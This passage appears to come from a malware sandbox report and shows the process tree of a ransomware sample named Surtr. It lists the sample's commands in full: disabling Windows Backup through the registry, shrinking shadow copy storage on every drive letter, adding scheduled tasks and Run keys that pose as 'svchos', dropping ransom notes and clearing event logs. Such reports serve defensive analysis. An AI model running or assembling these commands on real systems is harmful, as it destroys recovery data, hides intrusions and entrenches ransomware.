                                                                                                                                                            2⤵
                                                                                                                                                              PID:684
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3684
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1224
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3848
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2108
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3636
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2084
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2192
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1800
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:3876
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:816
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3856
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3064
                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                      vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                      PID:3512
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3048
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3720
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3008
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3728
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3000
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3124
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2988
                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                    PID:2124
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2964
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3352
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2956
                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                          vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                          PID:3796
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2940
                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4072
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2920
                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                PID:2912
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2904
                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3044
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2456
                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                      PID:4044
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2528
                                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                        vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                        PID:4052
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1808
                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                          PID:1920
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:856
                                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                            vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                            PID:3348
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:864
                                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                              vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                                              PID:3704
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2308
                                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                PID:3084
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3096
                                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                  PID:4060
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3104
                                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                    PID:3576
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3112
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:3140
                                                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                        vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                                        PID:3076
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:3208
                                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                                          PID:2588
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:3356
                                                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                            vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                                            PID:296
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:3312
                                                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                              vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                                                              PID:3436
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:3288
                                                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                                vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                                PID:1328
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:3264
                                                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                                  PID:2052
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:3184
                                                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                                    vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                                    PID:620
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:3152
                                                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                                      PID:4308
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:3868
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:3148
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_jic101rxx5u76w.surt" "%TEMP%\Service\PublicData_jic101rxx5u76w.surt"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:4116
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_jic101rxx5u76w.surt" "%TEMP%\Service\PrivateData_jic101rxx5u76w.surt"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:4180
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:4292
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:4336
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:4384
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:4420
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                      attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                      PID:4432
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:4528
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                        attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                        PID:4536
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4552
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                          schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                          PID:4580
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:4796
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:4804
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                                                                          PID:4824
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:4832
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                              PID:4844
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4860
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                PID:4872
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:4896
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                  PID:4908
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:4920
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                    PID:4928
                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:2724
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                                                                                                                      wevtutil.exe cl Setup
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:2176
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
